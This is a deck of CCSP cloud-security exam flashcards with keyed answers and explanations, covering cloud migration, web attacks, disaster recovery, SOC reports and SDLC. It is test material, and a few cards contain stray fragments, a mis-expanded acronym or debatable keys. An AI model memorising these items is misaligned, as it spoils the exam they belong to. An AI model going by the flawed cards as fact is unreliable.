Pocket Prep 6 Flashcards

1
Q

Aden works for a large corporation that maintains its own traditional data center. They are beginning the work of planning their move to the cloud. They are going to build an Infrastructure as a Service (IaaS) environment in a public cloud provider and eventually shut down their data center. What can they expect in this move?

A. There will be close to the same number of physical machines in the virtual environment, but a few more
B. There will be close to the same number of physical machines in the virtual environment, but a few less
C. The number of virtual machines will mirror the number of physical servers that they previously had
D. The number of virtual machines will be much greater than the number of physical machines that they had

A

D. The number of virtual machines will be much greater than the number of physical machines that they had

Explanation:
Correct answer: The number of virtual machines will be much greater than the number of physical machines that they had

Moving from a physical data center to a virtual data center in an IaaS should not be a lift and shift. The number of virtual machines will not resemble the number of physical machines that they had. The data center should be redesigned from a data-centric point of view. The physical servers are likely, at best, at 25% utilization in the physical data center. As they build the IaaS, that is no longer the focus. The question is where the data is and who needs it and when and in what format. They can build containers for some of the deployments, build server-less Platform as a Service (PaaS) for other parts, and then deploy some Software as a Service (SaaS) for other parts of the business.

Lift and shift is never a good thing when moving from physical to virtual data centers.
Reference:

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 113-114.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A bad actor is targeting a cloud web application. She was able to send a properly formatted SELECT statement through one of the input fields. This returned data about the database that she could use to further attack the application.

What is the name of this type of attack?

A. Security misconfiguration
B. Cross-site request forgery (CSRF)
C. Cross-site scripting (XSS)
D. Structured Query Language (SQL) injection

A

D. Structured Query Language (SQL) injection

Explanation:
An SQL injection attack occurs when an attacker is able to send a properly formatted SQL command, which includes SELECT statements, through one of the input fields in the web applications. This malicious query can return information about the database that should not be publicly available. To prevent injection attacks, it’s important to ensure that any data sent through an input field is properly sanitized and validated.

XSS is an attack against the user’s browser and the user’s trust in the website. There are three types of XSS: DOM, Reflected, and Stored.

CSRF tricks the user to perform actions they would not have otherwise. It actually abuses the trust the server has in the user.

Security misconfiguration involves the inappropriate configuration of software. The more customizable the software is, the more likely it will be a misconfiguration.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 105-106.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 143.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

A corporation has hired Adit as the information security manager responsible for Business Continuity Management (BCM) throughout the business. The current plan that Adit and his team are working on is the critical plan that the incident responders will utilize if there is an event such as a fire or earthquake that affects the data center. The assumption that they are working on is that the facility itself will be destroyed, and they will need to move operations to a different location, at least, temporarily.

Which type of document would this be?

A. Business Continuity Plan (BCP)
B. Incident Response Plan (IRP)
C. Acceptable Use Policy (AUP)
D. Disaster Recovery Plan (DRP)

A

D. Disaster Recovery Plan (DRP)

Explanation:
The US NIST defines DRPs as “a written plan for processing critical applications in the event of a major hardware or software failure or destruction of facilities.” The DRP is most commonly considered a sub part of business continuity plans. The BCP is defined by NIST as “the documentation of a predetermined set of instructions or procedures that describe how an organization’s mission/business processes will be sustained during and after a significant disruption.” Because the scenario is about the physical destruction of the data center facility and its hardware and software, DRP is the more specific plan.

It is worth noting that this is a debatable take on BCP versus DRP. However, this seems to be the slightly more prevalent one that (ISC)2 seems to agree with.

IRPs are defined by NIST as “the documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of a malicious cyber attack against an organization’s information systems(s).”

The AUP informs users of the acceptable uses of resources such as their phones, computers, internet, and data.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 232-237.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 131-132.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Jia is working on the DevSecOps team as the information security professional. The developers are in the planning stage of the application and are working on the Application Programming Interface (API). The API protocol of choice is REpresentation State Transfer (REST). It is important to ensure that the communication between the applications is protected from prying eyes.

How would this be done?

A. Internet Protocol Security (IPSec)
B. Transport Layer Security (TLS)
C. Message Digest 5 (MD5)
D. Rivest Shamir Adelman (RSA)

A

B. Transport Layer Security (TLS)

Explanation:
REST uses basic HyperText Transfer Protocol (HTTP) so it can utilize TLS. TLS was originally designed as an SSL for web browsers, so it would work well here.

IPSec is a network layer protocol that is commonly used to protect connections between routers separated by a Wide Area Network (WAN) or for user Virtual Private Network (VPN) connections.

RSA is an asymmetric algorithm that is used to exchange symmetric keys and to create digital signatures to allow authentication of who or what is on the other side of the network.

MD5 is a hashing algorithm that is used to check integrity. Both RSA and MD5 could be the algorithms of choice in the TLS connection, but they do not make for good answers because it would be a symmetric algorithm, likely the Advanced Encryption Standard (AES).
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 159-163.

The Official (ISC)² CCSP CBK Reference, 4th

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Which of the following statements regarding type 2 hypervisors is TRUE?
A. Due to being software based, they are more vulnerable to flaws and exploits than type 1 hypervisors
B. Due to being hardware based, it’s less likely that an attacker will be able to inject malicious code into the hypervisor
C. Due to being software based, it’s less likely that an attacker will be able to inject malicious code into the hypervisor
D. Due to being hardware based, they are more vulnerable to flaws and exploits than type 1 hypervisors

A

A. Due to being software based, they are more vulnerable to flaws and exploits than type 1 hypervisors

Explanation:

Due to being software based, they are more vulnerable to flaws and exploits than type 1 hypervisors

Correct answer: Due to being software based, they are more vulnerable to flaws and exploits than type 1 hypervisors

Type 2 hypervisors are software based and operate independent of the hardware. This can make type 2 hypervisors more susceptible and vulnerable to flaws and software exploits than type 1 hypervisors.

Since type 1 hypervisors are tied into the physical hardware of the machine, it can be more difficult to inject malicious code.

When you have type 2 hypervisors, there are also more lines of code. There is the host operating system. Then you add a type 2 hypervisor. Then on top of that, there is another full operating system for the guest virtual machine. More lines of code means more possible flaws and then more possible ways for the bad actor to cause problems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

The corporate SOC has a core role in which of the following types of operational controls and standards?

A. Configuration Management
B. Service Level Management
C. Deployment Management
D. Incident Management

A

D. Incident Management

Explanation:
Standards such as the Information Technology Infrastructure Library (ITIL) and International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) 20000-1 define operational controls and standards, including:

Change Management: Change management defines a process for changes to software, processes, etc., reducing the risk that systems will break due to poorly managed changes. A formal change request should be submitted and approved or denied by a change control board after a cost-benefit analysis. If approved, the change will be implemented and tested. The team should also have a plan for how to roll back the change if something goes wrong.
Continuity Management: Continuity management involves managing events that disrupt availability. After a business impact assessment (BIA) is performed, the organization should develop and document processes for prioritizing the recovery of affected systems and maintaining operations throughout the incident.
Information Security Management: Information security management systems (ISMSs) define a consistent, company-wide method for managing cybersecurity risks and ensuring the confidentiality, integrity, and availability of corporate data and systems. Relevant frameworks include the ISO 27000 series, the NIST Risk Management Framework (RMF), and AICPA SOC 2.
Continual Service Improvement Management: Continual service improvement management involves monitoring and measuring an organization’s security and IT services. This practice should be focused on continuous improvement, and an important aspect is ensuring that metrics accurately reflect the current state and potential process.
Incident Management: Incident management refers to addressing unexpected events that have a harmful impact on the organization. Most incidents are managed by the corporate security operations center (SOC), which should have a defined and documented process in place for identifying and prioritizing incidents, notifying stakeholders, and remediating the incident.
Problem Management: Problems are the root causes of incidents, and problem management involves identifying and addressing these issues to prevent or reduce the impact of future incidents. The organization should track known incidents and have steps documented to fix them or workarounds to provide a temporary fix.
Release Management: Agile methodologies speed up the development cycle and leverage automated CI/CD pipelines to enable frequent releases. Release management processes ensure that software has passed required tests and manages the logistics of the release (scheduling, post-release testing, etc.).
Deployment Management: Deployment management involves managing the process from code being committed to a repository to it being deployed to users. In automated CI/CD pipelines, the focus is on automating testing, integration, and deployment processes. Otherwise, an organization may have processes in place to perform periodic, manual deployments.
Configuration Management: Configuration errors can render software insecure and place the organization at risk. Configuration management processes formalize the process of defining and updating the approved configuration to ensure that systems are configured to a secure state. Infrastructure as Code (IaC) provides a way to automate and standardize configuration management by building and configuring systems based on provided definition files.
Service Level Management: Service level management deals with IT’s ability to provide services and meet service level agreements (SLAs). For example, IT may have SLAs for availability, performance, number of concurrent users, customer support response times, etc.
Availability Management: Availability management ensures that services will be up and usable. Redundancy and resiliency are crucial to availability. Additionally, cloud customers will be partially responsible for the availability of their services (depending on the service model).
Capacity Management: Capacity management refers to ensuring that a service provider has the necessary resources available to meet demand. With resource pooling, a cloud provider will have fewer resources than all of its users will use but relies on them not using all of the resources at once. Often, capacity guarantees are mandated in SLAs.

Reference:

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 212-228.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Which of the following can make it difficult for a software developer using a public cloud to receive a security certification for their application?

A. The cost of auditing a cloud environment is much higher than the cost of auditing a physical data center
B. Many regulations require that applications be built in physical data centers to be considered secure
C. Cloud environments are inherently less secure than other physical environments
D. The cloud provider may not be willing to allow auditors the level of access needed to certify their environment

A

D. The cloud provider may not be willing to allow auditors the level of access needed to certify their environment

Correct answer: The cloud provider may not be willing to allow auditors the level of access needed to certify their environment

In many cases, to meet regulatory requirements, the underlying infrastructure and hosting environment of an application must undergo auditing before the application residing there can be certified. This can be a problem for applications hosted in the cloud, especially those in a public cloud. The cloud provider may not be willing to allow auditors the access needed to certify their environment. The cloud provider may also be unwilling or unable to meet the requirements necessary to be certified, anyway.

Cloud environments can be more secure, physically, than other environments. This depends on which cloud provider and their security compared to what the company has for data center security.

Regulations do not require that applications are located within secure data centers. There are rules about what the company must ensure exists, such as firewalls or that data must be accurate.

Auditing a cloud data center versus a traditional data center should not be more expensive. Cost depends on who is doing the auditing and the scope of the audit.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 175-176.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 161-162.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Which type of SOC report provides the MOST reliable guarantee that a service provider can meet its SLAs?

A. SOC 3
B. SOC 1
C. SOC 2 Type II
D. SOC 2 Type I

A

C. SOC 2 Type II

Explanation:
Service Organization Control (SOC) reports are generated by the American Institute of CPAs (AICPA). The three types of SOC reports are:

SOC 1: SOC 1 reports focus on financial controls and are used to assess an organization’s financial stability.
SOC 2: SOC 2 reports assess an organization's controls in different areas, including Security, Availability, Processing Integrity, Confidentiality, or Privacy. Only the Security area is mandatory in a SOC 2 report.
SOC 3: SOC 3 reports provide a high-level summary of the controls that are tested in a SOC 2 report but lack the same detail. SOC 3 reports are intended for general dissemination.

SOC 2 reports can also be classified as Type I or Type II. A Type I report is based on an analysis of an organization’s control designs but does not test the controls themselves. A Type II report is more comprehensive, as it tests the effectiveness and sustainability of the controls through a more extended audit.
Reference:

(ISC)2 CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 287-288.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 285-287.
D

SOC 2 Type I

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A cloud provider is expanding into a new region. They have been looking for the right location for their new data center. They have found an existing building that they could use, but the location is not ideal. They have also found a lot that is in a great location but has no building.

When considering options for choosing a data center, which option will give the organization the MOST control over all aspects of the data center?

A. Building
B. Renting
C. Leasing
D. Subletting

A

A. Building

Explanation:
Organizations that are able to build their own data centers will have the most input into everything from physical security to all other aspects of the setup.

However, buying, subletting, or leasing space in an already built data center is a much quicker and easier option for many organizations.
Reference:

(ISC)² CCSP Certified Cloud Security Professional Official Study Guide, 3rd Edition. Pg 193-194.

The Official (ISC)² CCSP CBK Reference, 4th Edition. Pg 113-119.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

The Privacy Management Framework (PMF), formerly known as the Generally Accepted Privacy Principles (GAPP) standard, was created to help businesses with creating and managing a privacy framework within their business. If a business fails to do this and inform its customers of their privacy policy, they have violated which of the PMF nine principles?

A. Agreement, notice, and communication
B. Collection and creation
C. Monitoring and enforcement
D. Data integrity and quality

A

A. Agreement, notice, and communication

Explanation:
Correct answer: Agreement, notice, and communication

The PMF replaced the GAPP standard in 2022. It was developed by the American Institute of Certified Public Accountants (AICPA) and the Canadian Institute for Chartered Accountants (CICA). The standard includes nine privacy principles to manage and prevent threats to privacy.

Agreement, notice, and communication is about having a privacy policy and informing your customers of it.

Collection and creation is where it is defined within the business what data will and will not be collected from its customers.

Data integrity and quality is about the company ensuring that when they collect data, it is correct and that they maintain that accuracy in their databases.

Monitoring and enforcement is about the company ensuring that they are reviewing the actions of their users to ensure that data is collected, maintained, managed, and disposed of according to their corporate policy and their privacy notice.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Anna was browsing a web page throughout the course of her work. She clicked through several different pages in search for a piece of information that she needed to complete a project. Over the course of the next few days, she noticed there were strange messages within her corporate account indicating the actions she was requesting could not be performed. However, she has not made any such requests.

What attack could she have encountered?

A. Broken access control
B. Cross-site scripting
C. Vulnerable and outdated components
D. Software and data integrity failure

A

B. Cross-site scripting

Explanation:
It appears that her session was hijacked, and the bad actor was trying to get into areas of the application that she was not allowed. A cross-site scripting (XSS) attack occurs when an attacker is able to inject malicious code into a web application. While this type of attack is mainly used to execute scripts and hijack a user’s session, it can also be used to deface or edit a web page without going through any authentication processes. The web application runs the scripts injected without validating them. There are three types of XSS: reflected, DOM, and stored XSS.

It is possible that the XSS attack was made by a vulnerable or outdated component. However, the scenario is more specific to XSS.

It is also possible that broken access control is also a problem, but the clue in the question is clicking through web pages.

Software and data integrity failures include issues such as insecure deserialization, which is an API failure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A cloud administrator needs to access the cloud environment remotely for administration purposes. The administrator needs to patch an existing virtual machine image and then use orchestration to cause the existing running machines to restart from the newly patched image. What tool would they use for this purpose?

A. Secure Shell (SSH)
B. Transparent Layer Security (TLS)
C. Management plane
D. A secure console

A

C. Management plane

Explanation:
The management plane is the way an administrator or operator would access their Infrastructure as a Service (IaaS) environment to patch and deploy those newly patched images.

SSH and TLS are encryption methods that are used to secure the connections for the management plane. Although these are not the best answers because the question discusses updating virtual machine images and then probably using orchestration to deploy them.

A secure console could be used in the data center to configure newly deployed servers, routers, and switches.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Zoe and her business continuity management team have decided that the best cloud option that they could use for their business is to set up a different availability zone as their failover location. In testing their Business Continuity / Disaster Recovery (BC/DR) plan, Zoe’s team has brought their recovery cloud online in the western half of the United States to an operational state of readiness, while leaving their primary site active and operational in the eastern half of the United States.

What type of test was conducted in this scenario?

A. Full interruption test
B. Simulation test
C. Parallel test
D. Tabletop test

A

C. Parallel test

Explanation:
A parallel test is a type of test for Business Continuity / Disaster Recovery (BC/DR) plans in which the recovery site is brought online to a state of operational readiness, but operations at the primary site are also maintained and active. A parallel test brings the alternate or backup systems online without taking the primary systems offline.

There are a few different sets of names that someone can use when they are discussing BC/DR tests. A tabletop test is also known as a structured walk through. This type of test is done in a conference room where the team verbally walks through the plan.

A simulation test is also called a dry run. The other systems are not brought online, but maybe the call tree is activated. In a cloud data center, this could be a fire drill.

If the operations are switched from the primary systems to the backup systems, this could be called a full or full interruption test.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

The Cloud Service Provider (CSP) is responsible for security of the cloud, and the Cloud Consumer (CC) is responsible for security in the cloud. What cloud security model is this referring to?

A. Shared responsibility
B. Enterprise Architecture
C. Well Architected Framework
D. Resiliency

A

A. Shared responsibility

Explanation:
The shared responsibility model divides responsibility between the CSP and the CC. Who is responsible for what depends on what has been negotiated and on the model, Infrastructure, Platform or Software as a Service as well as the vendor and their decisions.

The Well Architected Framework is a security framework from Microsoft Azure and Amazon AWS. It defines best practices that should be used for cloud security.

The Enterprise Architecture is from the Cloud Security Alliance. It was formerly known as the Trusted Cloud Initiative. This was designed to help guide a business through designing a secure cloud structure.

Resiliency is the concept that redundancy should be added to ensure that systems are available when needed.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

The main goal of the European Union’s (EU) General Data Protection Regulation (GDPR) is to ensure that individuals’ personal data is protected for/from . . .

A. Repudiation purposes
B. Confidentiality purposes
C. Integrity purposes
D. Availability purposes

A

B. Confidentiality purposes

Explanation:
The main goal of GDPR is to ensure that individuals’ personal data is protected for confidentiality purposes. There is more involved concerning this topic, but this is the fundamental basics.

Availability is ensuring that data and systems are available to those that need it, when they need it.

Integrity is ensuring that the data remains as it is—that it is not corrupted, changed, or modified by anyone who is not authorized to do so and ensuring that it is not tampered with.

Repudiation is the ability for someone to deny or argue that they did something. We talk about nonrepudiation with digital signatures to ensure that we know who created or sent something.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

An organization may embrace infrastructure as code (IaC) to enhance its processes in which of the following areas?

A. Release Management
B. Configuration Management
C. Deployment Management
D. Change Management

A

B. Configuration Management

Explanation:
Standards such as the Information Technology Infrastructure Library (ITIL) and International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) 20000-1 define operational controls and standards, including:

Change Management: Change management defines a process for changes to software, processes, etc., reducing the risk that systems will break due to poorly managed changes. A formal change request should be submitted and approved or denied by a change control board after a cost-benefit analysis. If approved, the change will be implemented and tested. The team should also have a plan for how to roll back the change if something goes wrong.
Continuity Management: Continuity management involves managing events that disrupt availability. After a business impact assessment (BIA) is performed, the organization should develop and document processes for prioritizing the recovery of affected systems and maintaining operations throughout the incident.
Information Security Management: Information security management systems (ISMSs) define a consistent, company-wide method for managing cybersecurity risks and ensuring the confidentiality, integrity, and availability of corporate data and systems. Relevant frameworks include the ISO 27000 series, the NIST Risk Management Framework (RMF), and AICPA SOC 2.
Continual Service Improvement Management: Continual service improvement management involves monitoring and measuring an organization’s security and IT services. This practice should be focused on continuous improvement, and an important aspect is ensuring that metrics accurately reflect the current state and potential process.
Incident Management: Incident management refers to addressing unexpected events that have a harmful impact on the organization. Most incidents are managed by a corporate security team, which should have a defined and documented process in place for identifying and prioritizing incidents, notifying stakeholders, and remediating the incident.
Problem Management: Problems are the root causes of incidents, and problem management involves identifying and addressing these issues to prevent or reduce the impact of future incidents. The organization should track known incidents and have steps documented to fix them or workarounds to provide a temporary fix.
Release Management: Agile methodologies speed up the development cycle and leverage automated CI/CD pipelines to enable frequent releases. Release management processes ensure that software has passed required tests and manages the logistics of the release (scheduling, post-release testing, etc.).
Deployment Management: Deployment management involves managing the process from code being committed to a repository to it being deployed to users. In automated CI/CD pipelines, the focus is on automating testing, integration, and deployment processes. Otherwise, an organization may have processes in place to perform periodic, manual deployments.
Configuration Management: Configuration errors can render software insecure and place the organization at risk. Configuration management processes formalize the process of defining and updating the approved configuration to ensure that systems are configured to a secure state. Infrastructure as Code (IaC) provides a way to automate and standardize configuration management by building and configuring systems based on provided definition files.
Service Level Management: Service level management deals with IT’s ability to provide services and meet service level agreements (SLAs). For example, IT may have SLAs for availability, performance, number of concurrent users, customer support response times, etc.
Availability Management: Availability management ensures that services will be up and usable. Redundancy and resiliency are crucial to availability. Additionally, cloud customers will be partially responsible for the availability of their services (depending on the service model).
Capacity Management: Capacity management refers to ensuring that a service provider has the necessary resources available to meet demand. With resource pooling, a cloud provider will have fewer resources than all of its users will use but relies on them not using all of the resources at once. Often, capacity guarantees are mandated in SLAs.
17
Q

Which of the following is the LEAST disruptive type of exercise in which the participants carry out all of the actions of the BCP?

A. Simulation
B. Parallel Test
C. Tabletop Exercise
D. Full Test

A

B. Parallel Test

Explanation:
Business continuity/disaster recovery plan (BCP/DRP) testing can be performed in various ways. Some of the main types of tests include:

Tabletop Exercises: In a tabletop exercise, the participants talk through a provided scenario. They say what they would do in a situation but take no real actions.
Simulation/Dry Run: A simulation involves working and talking through a scenario like a tabletop exercise. However, the participants may take limited, non-disruptive actions, such as spinning up backup cloud resources that would be used during a real incident.
Parallel Test: In a parallel test, the full BC/DR process is carried out alongside production systems. In a parallel test, the BCP/DRP steps are actually performed.
Full Test:  In a full test, primary systems are taken down as they would be in the simulated event. This test ensures that the BCP/DRP systems and processes are capable of maintaining and restoring operations.
18
Q

Esti is working with the cloud operators as an information security manager. They are currently working to ensure that the web browser version that has been deployed for the users to access the Software as a Service (SaaS) that they have subscribed to is compliant with their policies and baselines. They are checking the client browsers to ensure they meet the corporate security standards and baselines for protection of data.

This can help to mitigate which vulnerability?

A. Insufficient logging
B. XML external entities
C. Injection
D. Cryptographic failures

A

D. Cryptographic failures

Explanation:
Cryptographic failures (formerly Sensitive data exposure) refer to vulnerabilities or weaknesses in the implementation or use of cryptographic algorithms and mechanisms, leading to the compromise of sensitive data. It includes:

Weak encryption algorithms
Insecure key management
Insufficient key length
Insecure random number generation
etc.

XXE is a security vulnerability that occurs when an application processes XML input in an insecure manner, allowing an attacker to include external entities or files that can be maliciously exploited.

Injection refers to a type of attack where malicious code is injected into an application’s input fields or parameters, allowing an attacker to manipulate the application’s behavior and gain unauthorized access to data or execute arbitrary commands, including SQL and OS commands.

Insufficient logging is just that, not enough logging. We do not know what happened unless we can see the logs. Logging does not protect the data.

Injection is more directly related to the websites themselves. In this scenario, Esti and the team are checking the browser. There are many cryptographic settings within the browser itself.

19
Q

During which phase of the SDLC should test cases be created for the identified requirements?

A. Development
B. Testing
C. Requirements
D. Design

A

D. Design

Explanation:
The Software Development Lifecycle (SDLC) describes the main phases of software development from initial planning to end-of-life. While definitions of the phases differ, one commonly-used description includes these phases:

Requirements: During the requirements phase, the team identifies the software's role and the applicable requirements. This includes business, functional, and security requirements.
Design: During this phase, the team creates a plan for the software that fulfills the previously identified requirements. Often, this is an iterative process as the design moves from high-level plans to specific ones. Also, the team may develop test cases during this phase to verify the software against requirements.
Development: This phase is when the software is written. It includes everything up to the actual build of the software, and unit testing should be performed regularly through the development phase to verify that individual components meet requirements.
Testing: After the software has been built, it undergoes more extensive testing. This should verify the software against all test cases and ensure that they map back to and fulfill all of the software’s requirements.
Deployment: During the deployment phase, the software moves from development to release. During this phase, the default configurations of the software are defined and reviewed to ensure that they are secure and hardened against potential attacks.
Operations and Maintenance (O&M): The O&M phase covers the software from release to end-of-life. During O&M, the software should undergo regular monitoring, testing, etc., to ensure that it remains secure and fit for purpose.
20
Q

What is generally part of the development coding phase of the Secure Software Development Life Cycle (SSDLC)?

A. Acceptance testing
B. Functional testing
C. Unit testing
D. Useability testing

A

C. Unit testing

Explanation:
The coding phase of the SSDLC covers the generation of software components as well as integrations and the building of the overall solution. Unit testing is part of the coding process. This is a developer’s test of the modules that are being developed as part of a larger architecture. All the module’s pathways must be tested.

Functional testing is a way to test the features of the application. This is best after the bulk of the coding has been done.

Useability testing is also a way to test the application with people who represent the users.

Acceptance testing is a way to test the application to see what degree the application meets the user’s requirements.

21
Q
A